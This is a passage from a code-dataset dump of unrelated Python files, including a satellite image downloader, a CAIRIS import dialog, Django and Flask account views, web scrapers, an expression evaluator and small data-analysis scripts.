NN_1' \")\n\n command_line_parser.add_option(\"--fprint\",\"-i\", dest=\"footprint\", default = '',\n help=\"Image footprint: lat1,lon1:lat2,lon2 \")\n\n command_line_parser.add_option(\"--logfile\",\"-z\", dest=\"logfile\",\n default=\"Download_log\",\n help=\"Log file\")\n \n command_line_parser.add_option(\"--pass\", \"-p\", dest=\"password\",\n default=\"\",\n help=\"Password\")\n \n command_line_parser.add_option(\"--user\", \"-n\", dest=\"user\",\n default=\"\",\n help=\"Username\")\n\n command_line_parser.add_option(\"--url\", \"-u\", dest=\"url\",\n default=\"\",\n help=\"Username\")\n \n options,arguments = command_line_parser.parse_args()\n\n#-------------------------------------------------------------------------------\n#-main----\nif __name__ == \"__main__\":\n # ---------------------------------------------------------------------------\n # parse options\n par = parse_options(options)\n logfile = par[\"logfile\"]+\"_\"+datetime.now().strftime('%Y%m%d_%H%M%S')+\".log\"\n \n # set file logger\n try:\n if os.path.exists(logfile):\n os.remove(logfile)\n logging.basicConfig(filename=logfile,level=logging.INFO)\n print(\"Logging to: \"+logfile)\n except:\n raise Exception(\"Failed to set logger\")\n\n # off we go\n entries = process_request(par,logging)\n\n if entries:\n download_files(par,entries,logging)\n\n logging.info(\"Done\")\n\n#-EOF\n","sub_path":"Auto_downloaders/Universal_Sentinel_Downloader.py","file_name":"Universal_Sentinel_Downloader.py","file_ext":"py","file_size_in_byte":15731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"54355523","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport wx\nimport armid\nimport os\nimport ARM\nfrom Borg import Borg\nfrom VulnerabilityParameters import VulnerabilityParameters\nfrom ThreatParameters import ThreatParameters\nfrom DirectoryEntryDialog import DirectoryEntryDialog\nimport ObjectFactory\n\nclass DirectoryDialog(wx.Dialog):\n def __init__(self,parent,dimensionName):\n wx.Dialog.__init__(self,parent,armid.DIRECTORYDIALOG_ID,'Import ' + dimensionName,style=wx.DEFAULT_DIALOG_STYLE|wx.MAXIMIZE_BOX|wx.THICK_FRAME|wx.RESIZE_BORDER,size=(600,400))\n b = Borg()\n self.dbProxy = b.dbProxy\n mainSizer = wx.BoxSizer(wx.VERTICAL)\n self.theSelectedIdx = -1\n self.theDimensionName = dimensionName\n self.entries = []\n self.typedEntries = []\n if (self.theDimensionName == 'vulnerability'):\n self.entries = self.dbProxy.getVulnerabilityDirectory() \n elif (self.theDimensionName == 'threat'):\n self.entries = self.dbProxy.getThreatDirectory() \n \n self.typeDictionary = {}\n for entry in self.entries:\n entryType = entry[3]\n if entryType not in self.typeDictionary:\n self.typeDictionary[entryType] = []\n self.typeDictionary[entryType].append(entry)\n typeBox = wx.StaticBox(parent,-1,'Type')\n comboSizer = wx.StaticBoxSizer(typeBox,wx.HORIZONTAL)\n mainSizer.Add(comboSizer,0,wx.EXPAND)\n typeNames = self.typeDictionary.keys()\n typeNames.sort()\n typeNames = [''] + typeNames\n self.typeCtrl = wx.ComboBox(self,armid.DIRECTORYDIALOG_COMBOTYPE_ID,\"\",choices=typeNames,size=wx.DefaultSize,style=wx.CB_READONLY)\n comboSizer.Add(self.typeCtrl,1,wx.EXPAND)\n\n self.entryList = wx.ListCtrl(self,armid.DIRECTORYDIALOG_LISTENTRIES_ID,style=wx.LC_REPORT)\n self.entryList.InsertColumn(0,'Label')\n self.entryList.InsertColumn(1,'Name')\n self.entryList.SetColumnWidth(0,200)\n self.entryList.SetColumnWidth(1,500)\n for idx,dirEntry in enumerate(self.entries):\n self.entryList.InsertStringItem(idx,dirEntry[0])\n self.entryList.SetStringItem(idx,1,dirEntry[1])\n mainSizer.Add(self.entryList,1,wx.EXPAND)\n self.typedEntries = self.entries\n\n buttonSizer = wx.BoxSizer(wx.HORIZONTAL)\n mainSizer.Add(buttonSizer,0,wx.CENTER)\n importButton = wx.Button(self,armid.DIRECTORYDIALOG_BUTTONIMPORT_ID,'Import')\n buttonSizer.Add(importButton)\n cancelButton = wx.Button(self,wx.ID_CANCEL,\"Cancel\")\n buttonSizer.Add(cancelButton)\n self.SetSizer(mainSizer)\n\n wx.EVT_LIST_ITEM_SELECTED(self.entryList,armid.DIRECTORYDIALOG_LISTENTRIES_ID,self.onItemSelected)\n wx.EVT_LIST_ITEM_DESELECTED(self.entryList,armid.DIRECTORYDIALOG_LISTENTRIES_ID,self.onItemDeselected)\n wx.EVT_LIST_ITEM_ACTIVATED(self.entryList,armid.DIRECTORYDIALOG_LISTENTRIES_ID,self.onItemActivated)\n wx.EVT_COMBOBOX(self.typeCtrl,armid.DIRECTORYDIALOG_COMBOTYPE_ID,self.onTypeSelected)\n wx.EVT_BUTTON(self,armid.DIRECTORYDIALOG_BUTTONIMPORT_ID,self.onImport)\n\n dimIconFile = dimensionName + '.png'\n dimIcon = wx.Icon(b.imageDir + '/' + dimIconFile,wx.BITMAP_TYPE_PNG)\n self.SetIcon(dimIcon)\n\n\n def onItemSelected(self,evt):\n self.theSelectedIdx = evt.GetIndex()\n\n def onItemDeselected(self,evt):\n self.theSelectedIdx = evt.GetIndex()\n\n def onImport(self,evt):\n if (self.theSelectedIdx == -1):\n errorString = 'No ' + self.theDimensionName + 's selected'\n errorLabel = 'Add ' + self.theDimensionName\n dlg = wx.MessageDialog(self,errorString,errorLabel,wx.OK) \n dlg.ShowModal()\n dlg.Destroy()\n return\n else:\n self.EndModal(armid.DIRECTORYDIALOG_BUTTONIMPORT_ID)\n\n def object(self): \n row = self.typedEntries[self.theSelectedIdx]\n p = None\n if (self.theDimensionName == 'vulnerability'):\n vulName = row[0]\n vulDesc = row[1] + '\\n\\n' + row[2]\n vulType = row[3]\n p = VulnerabilityParameters(vulName,vulDesc,vulType,[])\n else:\n thrName = row[0]\n thrMethod = row[1] + '\\n\\n' + row[2]\n thrType = row[3]\n p = ThreatParameters(thrName,thrType,thrMethod,[])\n return ObjectFactory.build(-1,p)\n\n def onItemActivated(self,evt):\n self.theSelectedIdx = evt.GetIndex()\n row = self.typedEntries[self.theSelectedIdx]\n dLabel = row[0]\n dName = row[1]\n dType = row[3]\n dDesc = row[2]\n dlg = DirectoryEntryDialog(self,dLabel,dName,dType,dDesc)\n dlg.ShowModal()\n dlg.Destroy()\n\n def onTypeSelected(self,evt):\n typeName = evt.GetString()\n self.entryList.DeleteAllItems()\n if (typeName == ''):\n self.typedEntries = self.entries\n else:\n self.typedEntries = self.typeDictionary[typeName]\n for idx,dirEntry in enumerate(self.typedEntries):\n self.entryList.InsertStringItem(idx,dirEntry[0])\n self.entryList.SetStringItem(idx,1,dirEntry[1])\n","sub_path":"cairis/cairis/DirectoryDialog.py","file_name":"DirectoryDialog.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"155789898","text":"from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String\nfrom sqlalchemy.engine import create_engine\nfrom sqlalchemy.orm.session import sessionmaker\nimport subprocess\nimport os\nfrom config import *\n\n\n__all__ = ['Base', 'engine', 'Session', 'Service', 'setup']\n\n\nBase = declarative_base()\nengine = create_engine('sqlite:////usr/local/gentoo-chroot/var/gentoo-chroot.db', echo=False)\nSession = sessionmaker(bind=engine)\n\n\nclass Service(Base):\n __tablename__ = 'services'\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n launch_script = Column(String)\n status_command = Column(String)\n\n def start(self):\n with open(os.devnull, 'w') as devnull:\n status = not subprocess.call(['chroot', chroottarget, '/bin/bash', '-c', self.launch_script + ' start'], stdin=devnull, stdout=devnull, stderr=devnull, env={'PATH': env_path})\n return status\n\n def stop(self):\n with open(os.devnull, 'w') as devnull:\n status = not subprocess.call(['chroot', chroottarget, '/bin/bash', '-c', self.launch_script + ' stop'], stdin=devnull, stdout=devnull, stderr=devnull, env={'PATH': env_path})\n return status\n\n @property\n def status(self):\n with open(os.devnull, 'w') as devnull:\n status = not subprocess.call(['chroot', chroottarget, '/bin/bash', '-c', self.status_command], stdin=devnull, stdout=devnull, stderr=devnull, env={'PATH': env_path})\n return status\n\n\ndef setup():\n Base.metadata.create_all(engine)\n","sub_path":"spk/gentoo-chroot/src/app/application/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"98198114","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 20 22:08:55 2017\n\n@author: katsuhisa\n\"\"\"\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import svm\nfrom sklearn.decomposition import PCA\nfrom scipy import stats\n\n\n# change path to the data directory\nos.chdir(r'C:\\Users\\katsuhisa\\Dropbox\\spikefinder\\spikefinder.train\\spikefinder.train')\n\ndata_all = ['1','2','3','4','5','6','7','8','9','10']\ndata_V1 = ['1','2','3','5','6','7','8','9','10']\ndata_ret = '1'\n\n\ndef plot(calcium, spikes, panel):\n x = np.arange(len(calcium)) / 100.0\n #plt.figure(figsize=(15, 3))\n plt.plot(x, calcium, color=(.1, .6, .4))\n plt.plot(x, spikes / 2.0 - 1, color='k')\n plt.yticks([])\n plt.ylim([-2., 4.])\n plt.xlim(panel)\n plt.grid()\n \n \ndef pca95(datanumber):\n calcium_train = pd.read_csv(datanumber + '.train.calcium.csv')\n pca = PCA()\n pca.fit(calcium_train)\n return pca\n \n\n \n \n \n# plot all the traces with tag-names\nfig = plt.figure()\nsubp = 1\nfor d in data_V1:\n calcium_train = pd.read_csv(d + '.train.calcium.csv')\n spikes_train = pd.read_csv(d + '.train.spikes.csv')\n\n fig.add_subplot(len(data_V1),1,subp)\n plot(calcium_train['1'], spikes_train['1'], [0, 100])\n \n if d != '10':\n plt.tick_params(\n axis='x',\n which='both',\n bottom='off',\n top='off',\n labelbottom='off')\n subp += 1\n \nplt.show()\n\npca95('1')\n ","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"558538737","text":"from datetime import datetime\nfrom django.http import Http404\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.views.generic import ListView, TemplateView\nfrom organisations.models import Organisation\n\n\nclass SupportedOrganisationsView(ListView):\n template_name = \"organisations/supported_organisations.html\"\n queryset = Organisation.objects.all().order_by(\"organisation_type\", \"common_name\")\n\n\nclass OrganisationsFilterView(TemplateView):\n template_name = \"organisations/organisation_filter.html\"\n\n def get_context_data(self, **kwargs):\n orgs = Organisation.objects.all().filter(**kwargs)\n if not orgs.exists():\n raise Http404()\n\n paginator = Paginator(orgs, 100) # Show 100 records per page\n page = self.request.GET.get(\"page\")\n context = {\"context_object_name\": \"organisation\"}\n try:\n context[\"objects\"] = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n context[\"objects\"] = paginator.page(1)\n except EmptyPage:\n # If page is out of range, deliver last page of results.\n context[\"objects\"] = paginator.page(paginator.num_pages)\n\n return context\n\n\nclass OrganisationDetailView(TemplateView):\n template_name = \"organisations/organisation_detail.html\"\n\n def get_context_data(self, **kwargs):\n kwargs[\"date\"] = datetime.strptime(kwargs[\"date\"], \"%Y-%m-%d\").date()\n try:\n obj = Organisation.objects.all().get_by_date(**kwargs)\n except Organisation.DoesNotExist:\n raise Http404()\n\n context = {\n \"object\": obj,\n \"api_detail\": obj.get_url(\"api:organisation-detail\"),\n \"context_object_name\": \"organisation\",\n }\n if obj.get_geography(kwargs[\"date\"]):\n context[\"api_detail_geo\"] = obj.get_url(\"api:organisation-geo\", \"json\")\n return context\n","sub_path":"every_election/apps/organisations/views/public.py","file_name":"public.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"470069529","text":"import io\n\nfrom jeffy.framework import get_app\n\napp = get_app()\n\n\n@app.handlers.common()\ndef common_example(event, context):\n \"\"\"Common handler example.\"\"\"\n return event\n\n\n@app.handlers.s3()\ndef s3_example(event, context):\n \"\"\"Common handler example.\"\"\"\n return event\n\n\ndef test_common():\n \"\"\"Common handler test.\"\"\"\n assert common_example({'foo': 'bar'}, {}) == {'foo': 'bar'}\n\n\ndef test_s3(mocker):\n \"\"\"S3 handler test.\"\"\"\n m = mocker.Mock()\n m.get_object = mocker.Mock(return_value={\n 'Metadata': {'foo': 'bar'},\n 'Body': io.StringIO('buz')\n })\n s3m = mocker.Mock()\n s3m.get_resource = mocker.Mock(return_value=m)\n mocker.patch('jeffy.sdk.s3.S3').return_value = s3m\n assert s3_example({'Records': [\n {'s3': {\n 'bucket': {'name': 'bucket_name'},\n 'object': {'key': 'object_key'}\n }}\n ]}, {}) == [{\n 'key': 'object_key',\n 'bucket_name': 'bucket_name',\n 'body': 'buz',\n 'metadata': {'foo': 'bar'}\n }]\n","sub_path":"tests/integration_test.py","file_name":"integration_test.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"158404024","text":"import sys\nimport json\n\nif len(sys.argv) < 2:\n print(\"Please provide a config file\")\n sys.exit()\n\nconfigOptions = None\nconfigFileName = sys.argv[1]\n\n'''\n Getting the configuration options from the config file\n'''\n\ndef getConfig():\n\n global configOptions\n\n if configOptions is None:\n try:\n with open(configFileName, \"r\") as readFile:\n configOptions = json.load(readFile)\n return configOptions\n except Exception as e:\n raise Exception(\"Cannot read the config file\")\n\n else:\n return configOptions\n","sub_path":"app/utils/configReader.py","file_name":"configReader.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"260176757","text":"from django import urls\nfrom django.urls import path\nfrom newwebsite.views import (\n home_list_view,\n post_detail_view,\n category_list_view,\n search_list_view,\n about_us_list_view,\n privacy_policy_list_view,\n terms_and_conditions_list_view,\n)\n\n\nurlpatterns = [\n path('', home_list_view, name='home'),\n path('download//', post_detail_view, name='post-details'), \n path('category//', category_list_view, name='category'),\n path('about_us/', about_us_list_view, name='about'),\n path('privacy_policy/', privacy_policy_list_view, name='privacy_policy'),\n path('terms_and_conditions/', terms_and_conditions_list_view, name='Ts&Cs'),\n path('search/', search_list_view, name='search'),\n \n]","sub_path":"newwebsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"468286610","text":"from urllib.request import urlopen\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\n\r\nhtml = urlopen(\"https://www.flipkart.com/mens-watches-store?otracker=nmenu_sub_Men_0_Watches\")\r\nsoup = BeautifulSoup(html,'lxml')\r\ndabba = soup.find_all('div', class_='_3liAhj _2Vsm67')\r\n\r\nname=[]\r\nprice=[]\r\nrating=[]\r\nfor i in dabba:\r\n n = i.find('a',class_='_2cLu-l')\r\n if n is None:\r\n name.append('NaN')\r\n else:\r\n name.append(n.text)\r\n p = i.find('div',class_='_1vC4OE')\r\n if p is None:\r\n price.append('NaN')\r\n else:\r\n price.append(p.text)\r\n r = i.find('div',class_='hGSR34')\r\n if r is None:\r\n rating.append('NaN')\r\n else:\r\n rating.append(r.text)\r\n\r\nwpname=[]\r\nwpprice=[]\r\nwprating=[]\r\nfor x in name:\r\n wpname.append(x)\r\nfor x in price:\r\n wpprice.append(x)\r\nfor x in rating:\r\n wprating.append(x)\r\nprint(wpname)\r\nprint(wpprice)\r\nprint(wprating)\r\n\r\ndf = pd.DataFrame({'name':wpname, 'price':wpprice, 'rating':wprating})\r\nprint(df)","sub_path":"men.py","file_name":"men.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"631928229","text":"# future must be first\nfrom __future__ import division\nimport operator\n\nimport numpy as np\n\n\nclass EvalTerm(object):\n \"\"\"\n Base class for evaluation\n \"\"\"\n\n def __init__(self, tokens):\n self.value = tokens[0]\n\n def operator_operands(self, tokenlist):\n \"generator to extract operators and operands in pairs\"\n it = iter(tokenlist)\n while 1:\n try:\n yield (it.next(), it.next())\n except StopIteration:\n break\n\n def operation(self, op, result, val):\n return self.operations[op](result, val)\n\n\n\nclass EvalConstant(EvalTerm):\n \"\"\"\n Class to evaluate a parsed constant or variable\n \"\"\"\n\n def _eval(self, row):\n try:\n np.float64(self.value)\n return self.value\n except ValueError:\n return row[self.value]\n\n\nclass EvalString(EvalTerm):\n \"\"\"\n Class to evaluate a parsed string.\n \"\"\"\n\n def _eval(self, row):\n return self.value\n\n\nclass EvalSignOp(EvalTerm):\n \"\"\"\n Class to evaluate expressions with a leading + or - sign\n \"\"\"\n\n def __init__(self, tokens):\n self.sign, self.value = tokens[0]\n\n def _eval(self, row):\n mult = {'+':1, '-':-1}[self.sign]\n return mult * self.value._eval(row)\n\n\nclass EvalBinaryArithOp(EvalTerm):\n \"\"\"\n Class for evaluating binary arithmetic operations\n \"\"\"\n\n operations = {\n '+': operator.__add__,\n '-': operator.__sub__,\n '*': operator.__mul__,\n '/': operator.__truediv__,\n '^': operator.__pow__,\n }\n\n def _eval(self, row):\n result = np.float64(self.value[0]._eval(row))\n for op, val in self.operator_operands(self.value[1:]):\n val = np.float64(val._eval(row))\n result = self.operation(op, result, val)\n if np.isinf(result):\n return np.nan\n return result\n\n\nclass EvalMultOp(EvalBinaryArithOp):\n \"\"\"\n Class to distinguish precedence of multiplication/division expressions\n \"\"\"\n pass\n\n\nclass EvalPlusOp(EvalBinaryArithOp):\n \"\"\"\n Class to distinguish precedence of addition/subtraction expressions\n \"\"\"\n pass\n\n\nclass EvalExpOp(EvalBinaryArithOp):\n \"\"\"\n Class to distinguish precedence of exponentiation expressions\n \"\"\"\n pass\n\n\nclass EvalComparisonOp(EvalTerm):\n \"\"\"\n Class to evaluate comparison expressions\n \"\"\"\n\n opMap = {\n \"<\" : lambda a,b : a < b,\n \"<=\" : lambda a,b : a <= b,\n \">\" : lambda a,b : a > b,\n \">=\" : lambda a,b : a >= b,\n \"!=\" : lambda a,b : a != b,\n \"=\" : lambda a,b : a == b,\n }\n\n def _eval(self, row):\n val1 = np.float64(self.value[0]._eval(row))\n for op, val in self.operator_operands(self.value[1:]):\n fn = EvalComparisonOp.opMap[op]\n val2 = np.float64(val._eval(row))\n if not fn(val1, val2):\n break\n val1 = val2\n else:\n return True\n return False\n\n\nclass EvalNotOp(EvalTerm):\n \"\"\"\n Class to evaluate not expressions\n \"\"\"\n\n def __init__(self, tokens):\n self.value = tokens[0][1]\n\n def _eval(self, row):\n return not self.value._eval(row)\n\n\nclass EvalBinaryBooleanOp(EvalTerm):\n \"\"\"\n Class for evaluating binary boolean operations\n \"\"\"\n\n operations = {\n 'and': lambda p, q: p and q,\n 'or': lambda p, q: p or q,\n }\n\n def _eval(self, row):\n result = np.bool_(self.value[0]._eval(row))\n for op, val in self.operator_operands(self.value[1:]):\n val = np.bool_(val._eval(row))\n result = self.operation(op, result, val)\n return result\n\n\nclass EvalAndOp(EvalBinaryBooleanOp):\n \"\"\"\n Class to distinguish precedence of and expressions\n \"\"\"\n pass\n\n\nclass EvalOrOp(EvalBinaryBooleanOp):\n \"\"\"\n Class to distinguish precedence of or expressions\n \"\"\"\n pass\n\n\nclass EvalInOp(EvalTerm):\n \"\"\"\n Class to eval in expressions.\n \"\"\"\n\n def _eval(self, row):\n val_to_test = str(self.value[0]._eval(row))\n val_list = []\n for op, val in self.operator_operands(self.value[1:]):\n val_list.append(val._eval(row))\n return val_to_test in val_list\n","sub_path":"lib/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"594821698","text":"sections = ('CPU-Z TXT Report',\n 'Binaries',\n 'Processors',\n 'APICs',\n 'Timers',\n 'Processors Information',\n 'Thread dumps',\n 'BIOS',\n 'Chipset',\n 'Memory SPD',\n 'Monitoring',\n 'LPCIO',\n 'Hardware Monitors',\n 'PCI Devices',\n 'DMI',\n 'Storage',\n 'USB Devices',\n 'Graphics',\n 'Graphic APIs',\n 'Display Adapters',\n 'Software',\n 'Register Spaces')\n\nfile = open('test_cpuz.txt', 'r')\n\ni = 0\nold_line = ''\nsection = ''\n\nfor line in file: \n if line[0] == '-':\n section = str(old_line).strip()\n i+=1\n print('{:2} {}'.format(i, str(old_line).strip()))\n old_line = line\n \n if section == sections[2]:\n if len(line.strip()) == 0:\n continue\n\n key = str(line).split('\\t')[0]\n value = str(line).split('\\t')[-1:][0] \n value = str(value).replace('\\n', '')\n \n if key == 'Number of sockets':\n print(key, value)\n \n if key == 'Number of threads':\n print(key, value)\n \n","sub_path":"parsing_cpuz.py","file_name":"parsing_cpuz.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"228077163","text":"from app.accounts.models.user import UserSession\nfrom app.accounts.models.database import User\n\nfrom app.accounts.forms import LoginForm, EmailForm, RegisterForm\n\nfrom mail import mail\n\nfrom database import db\n\n\nfrom flask import (\n flash,\n request,\n render_template,\n Blueprint,\n redirect,\n url_for,\n Markup,\n current_app as app,\n)\n\nfrom flask_mail import Message\nfrom python_freeipa import Client, exceptions\nimport uuid\nimport paramiko\nimport re\nfrom flask_login import login_user, logout_user, current_user, login_required\n\n\naccounts_blueprint = Blueprint(\"accounts\", __name__, template_folder=\"templates\")\n\n\n@accounts_blueprint.route(\"/\")\ndef home():\n print(current_user)\n # Redirect users who are not logged in.\n if not current_user or current_user.is_anonymous:\n return redirect(url_for(\"accounts.login\"))\n return render_template(\"profile.html\")\n\n\n@accounts_blueprint.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = LoginForm(request.form)\n if request.method == \"POST\" and form.validate():\n client = Client(\"ipa.freeside.co.uk\", verify_ssl=False, version=\"2.215\")\n try:\n uid = form.username.data\n client.login(uid, form.password.data)\n data = client.user_show(uid)\n login_user(UserSession(uid, data))\n flash(\"Logged in!\")\n return redirect(\"/\")\n except exceptions.Unauthorized:\n flash(\"Invalid username or password\")\n except exceptions.NotFound:\n flash(\"User not in database.\")\n return render_template(\"login.html\", form=form)\n\n\n@accounts_blueprint.route(\"/logout\")\n@login_required\ndef logout():\n logout_user()\n return redirect(\"/\")\n\n\n@accounts_blueprint.route(\"/join\", methods=[\"GET\", \"POST\"])\ndef register():\n form = EmailForm(request.form)\n if request.method == \"POST\" and form.validate():\n email = form.email.data\n if app.config[\"DEBUG\"] is False and \"hull.ac.uk\" not in email.split(\"@\")[1]:\n flash(\"Please enter a valid email, it should be your Uni email.\")\n else:\n user = User.query.filter_by(email=form.email.data).first()\n if user is None:\n uid = str(uuid.uuid4())\n user = User(email=form.email.data, uuid=uid)\n db.session.add(user)\n db.session.commit()\n\n msg = Message(\"Please verify your email!\", recipients=[form.email.data])\n msg.html = render_template(\"emails/verify.html\", uid=uid)\n with app.app_context():\n mail.send(msg)\n info_msg = Markup(\n \"Email sent this may take a while to arrive, \"\n \"Click the link in the activation email. \"\n \"If you can't find the email check your junk \"\n \"folder. If you have any issues please email \"\n \"support@freeside.co.uk or join our \"\n \"Discord.\"\n )\n return render_template(\"layout.html\", message=info_msg)\n else:\n info_msg = \"\"\n if user.account_created is True:\n info_msg = \"Account already exists!\"\n else:\n info_msg = Markup(\n \"Please click the link in the activation email. \"\n \"If you can't find the email check your junk \"\n \"folder. If you have any issues please email \"\n \"support@freeside.co.uk or join our \"\n \"Discord.\"\n )\n return render_template(\"layout.html\", message=info_msg)\n\n return render_template(\"join.html\", form=form)\n\n\n@accounts_blueprint.route(\"/verify/\", methods=[\"GET\", \"POST\"])\ndef verify_user(uid):\n form = RegisterForm(request.form)\n user = User.query.filter_by(uuid=uid).first_or_404()\n\n if request.method == \"POST\" and form.validate():\n client = Client(\"ipa.freeside.co.uk\", verify_ssl=False, version=\"2.215\")\n client.login(\"admin\", app.config[\"IPA_PASSWORD\"])\n username = user.email.split(\"@\")[0]\n firstname = form.first_name.data\n firstname = firstname.title()\n lastname = username.split(\".\")[-1].title()\n username = re.sub(\"[^a-zA-Z]+\", \"\", username)\n username = username.lower()\n\n try:\n ipauser = client.user_add(\n username,\n firstname,\n lastname,\n form.first_name.data + \" \" + lastname,\n display_name=form.display_name.data,\n mail=user.email,\n preferred_language=\"EN\",\n random_pass=True,\n )\n except exceptions.DuplicateEntry:\n flash(\"Account already exists.\")\n return render_template(\"layout.html\")\n print(ipauser[\"randompassword\"])\n client.change_password(username, form.password.data, ipauser[\"randompassword\"])\n user.account_created = True\n db.session.commit()\n\n createHomeDir(username)\n\n msg = Message(\"Welcome to Freeside\", recipients=[user.email])\n msg.html = render_template(\n \"emails/welcome.html\", firstname=firstname, username=username\n )\n with app.app_context():\n mail.send(msg)\n flash(\"Account created! Your username is: \" + username)\n return redirect(url_for(\"accounts.home\"))\n else:\n if user.account_created is True:\n flash(\"Account already verified!\")\n return redirect(url_for(\"accounts.home\"))\n else:\n return render_template(\"complete_registration.html\", form=form)\n\n\ndef createHomeDir(username):\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(\n \"storage.freeside.co.uk\", username=\"root\", password=app.config[\"IPA_PASSWORD\"]\n )\n ssh.exec_command(\"userdir.sh {}\".format(username))\n","sub_path":"app/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"235129940","text":"class Solution(object):\n def isEscapePossible(self, blocked, source, target):\n \"\"\"\n :type blocked: List[List[int]]\n :type source: List[int]\n :type target: List[int]\n :rtype: bool\n \"\"\"\n blocked_set = set()\n blocked_set.update(map(tuple, blocked))\n return self.bfs(blocked_set, source, target) and self.bfs(blocked_set, target, source)\n\n def bfs(self, blocked, origin, target):\n visited = set()\n visited.add((origin[0], origin[1]))\n queue = [(origin[0], origin[1])]\n step = 0\n while step < len(blocked):\n if not queue:\n return False\n step += 1\n next_queue = []\n for cell in queue:\n for neighbor in self.get_neighbors(cell):\n if neighbor not in visited and neighbor not in blocked:\n next_queue.append(neighbor)\n visited.add(neighbor)\n if neighbor[0] == target[0] and neighbor[1] == target[1]:\n return True\n queue = next_queue\n return True\n\n def get_neighbors(self, cell):\n return [t for t in [\n (cell[0] - 1, cell[1]),\n (cell[0] + 1, cell[1]),\n (cell[0], cell[1] - 1),\n (cell[0], cell[1] + 1),\n ] if self.is_valid(t)]\n\n def is_valid(self, t):\n return 0 <= t[0] < 1000000 and 0 <= t[1] < 1000000\n","sub_path":"src2/escape-a-large-maze/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"364852077","text":"import requests as rq\nimport numpy as np\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\n# Get Content\nurl = \"https://en.wikipedia.org/wiki/Georges_St-Pierre\"\nr = rq.get(url)\nsoup = BeautifulSoup(r.content, \"html.parser\")\n\n# Get table and record\nsection = soup.find('h2')\nrecord = soup.find('table', attrs={'class': 'wikitable sortable'})\n\nfights = list()\nfor row in record.find_all(\"tr\"):\n fighter = list()\n\n for col in row.find_all(\"td\"):\n fighter.append(col.text)\n\n fights.append(fighter)\n\n#Create data frame - Add fighter A column and swap opponent to fighter B\ncolnames = ['Res', 'Record', 'Opponent', 'Method', 'Event', 'Date', 'Round', 'Time', 'Location', 'Notes']\n\n#Initialize dataframe\ndf = pd.DataFrame(fights, columns=colnames)\n\n\n\n#Split columns and clean data\ndf[['Wins', 'Losses']] = df['Record'].str.split(\"–\", expand=True)\ndf[['WonBy', 'SubMethod']] = df['Method'].str.split(\"(\", expand=True)\ndf[['City', 'State/Province', 'Country']] = df['Location'].str.split(\",\", expand=True)\ndf = df.drop(df.index[0]) #drop empty first row\n\n#Clean up dates\ndef getDate(x):\n x = x.replace('00000000', '')\n x = x[0:10]\n x = dt.strptime(x, \"%Y-%m-%d\")\n return x\n\ndf['Date'] = df['Date'].apply(getDate)\n\n#Remove empty rows, old columns, and characters from new columns\ndf['SubMethod'] = df['SubMethod'].str.replace(')', '')\ncoldrop = ['Record', 'Method', 'Location']\ndf = df.drop(coldrop, 1)\n\n#Set index to dates of fights and add layover for each bout\ndf = df.set_index(df['Date'])\ndf['Delta'] = (df['Date'] - df['Date'].shift(-1)).fillna(0)\n\n\n\n\n\n","sub_path":"wikiscraper.py","file_name":"wikiscraper.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
